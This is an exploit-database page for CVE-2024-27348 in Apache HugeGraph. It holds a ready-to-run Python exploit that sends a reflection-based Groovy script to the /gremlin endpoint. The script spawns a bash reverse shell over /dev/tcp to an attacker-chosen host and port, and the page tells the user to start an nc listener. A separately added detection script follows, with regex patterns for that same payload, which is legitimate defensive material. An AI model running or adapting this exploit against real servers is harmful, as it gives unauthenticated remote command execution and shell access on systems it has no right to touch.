Apache HugeGraph Server 1.2.0 Remote Code Execution (RCE)
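Apache HugeGraph Server 1.2.0 has an unauthenticated remote code execution vulnerability (CVE-2024-27348) that lets an attacker inject code through a malicious Gremlin query, execute arbitrary commands on the target server, and establish a reverse shell connection.
2025-4-10 21:19:12 Author: cxsecurity.com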

# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024-27348

from requests import Request, Session
import sys
import json

def title():
    print('''
CVE-2024-27348
[+] Reverse shell
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
    ''')

def exploit(url, lhost, lport):
    # The "gremlin" field carries a Groovy script. It uses Java reflection to set the
    # current thread's name and then to construct and start a java.lang.ProcessBuilder.
    payload = {
        "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
        "bindings": {},
        "language": "gremlin-groovy",
        "aliases": {}
    }
    headers = {
        'Content-Type': 'application/json'}
    s = Session()
    # The script is POSTed to the server's /gremlin endpoint.
    url = url + "/gremlin"
    req = Request('POST', url, json=payload, headers=headers)
    prepped = req.prepare()
    # The Content-Type header is removed from the prepared request before sending.
    del prepped.headers['Content-Type']
    resp = s.send(prepped, verify=False, timeout=15)
    # Dump the request and response for inspection.
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(payload)
    print(resp.status_code)
    print(resp.text)

if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])
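
A request-inspection check for the payload shape used above, as an added example (not code from the original advisory or from Apache HugeGraph): it parses JSON bodies posted to /gremlin and flags the reflection and process-creation calls that the exploit's script relies on. The indicator names, the alert threshold and the sample requests are assumptions constructed for illustration.

```python
import json
import re

# Patterns drawn from the Gremlin-Groovy script in the exploit on this page.
# Indicator names are hypothetical labels chosen for this example.
INDICATORS = {
    "reflection_lookup": re.compile(r"Class\s*\.\s*forName\s*\("),
    "access_override": re.compile(r"setAccessible\s*\(\s*true\s*\)"),
    "thread_name_field": re.compile(r"getDeclaredField\s*\(\s*[\"']name[\"']\s*\)"),
    "process_spawn": re.compile(r"ProcessBuilder"),
    "dev_tcp_redirect": re.compile(r"/dev/tcp/"),
}


def inspect_gremlin_request(method, path, body):
    """Return sorted indicator names found in one HTTP request to /gremlin."""
    if method.upper() != "POST" or not path.split("?", 1)[0].rstrip("/").endswith("/gremlin"):
        return []
    try:
        # json.loads decodes \uXXXX escapes, so an escaped "Class" still matches.
        doc = json.loads(body)
    except ValueError:
        return ["unparseable_body"]
    script = doc.get("gremlin") if isinstance(doc, dict) else None
    if not isinstance(script, str):
        return []
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def should_alert(hits):
    """Assumed threshold: alert on process creation, or on any two indicators together."""
    return "process_spawn" in hits or len(hits) >= 2


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", "/gremlin", json.dumps({"gremlin": "g.V().limit(3)"})),
    ("POST", "/gremlin", json.dumps({"gremlin": 'Class.forName("java.lang.ProcessBuilder")'})),
    ("POST", "/gremlin", r'{"gremlin": "\u0043lass.forName(\"java.lang.Thread\").getDeclaredField(\"name\")"}'),
    ("POST", "/gremlin", "not json"),
    ("GET", "/graphs", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        hits = inspect_gremlin_request(method, path, body)
        print(method, path, hits, "ALERT" if should_alert(hits) else "ok")
```

Matching on the decoded JSON value rather than the raw body is what catches the third sample, where the script text is written with a Unicode escape.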



 



Source: https://cxsecurity.com/issue/WLB-2025040018